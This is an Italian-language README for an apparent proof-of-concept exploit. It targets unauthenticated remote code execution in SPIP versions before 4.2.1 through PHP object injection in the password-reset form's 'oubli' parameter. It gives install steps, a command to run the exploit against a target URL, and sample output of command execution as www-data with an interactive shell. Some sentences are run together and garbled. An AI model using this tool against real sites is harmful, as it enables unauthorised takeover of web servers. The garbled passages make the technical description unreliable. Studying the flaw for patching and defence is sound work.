
Exploit proof-of-concept per l'esecuzione remota di codice non autenticata in SPIP < 4.2.1 tramite iniezione di oggetti PHP nel modulo di reset della password. Fornisce una shell interattiva con gestione del token CSRF.
Vulnerabilità di esecuzione remota di codice non autenticata in SPIP precedente alla versione 4.2.1. Il parametro
oublinel modulo di reimpostazione della password è vulnerabile all'iniezione di oggetti PHP a causa di una deserializzazione gestita in modo errato. Un payload serializzato appositamente realizzato viene eseguito lato server come utente web, e l'output viene riflesso nella risposta all'interno del valore del campo di inputoubli.
/spip.php?page=spip_pass.oubli.value riflesso nella risposta.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit
python3 exploit.py -u http://TARGET/spip
Esempio:
$ python3 exploit.py -u http://10.10.10.10/spip
[*] Recupero token anti-CSRF...
[*] Test dell'esecuzione dei comandi...
[+] Il target è vulnerabile! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell aperta. Digita 'exit' o Ctrl+C per uscire.
Shell> whoami
www-data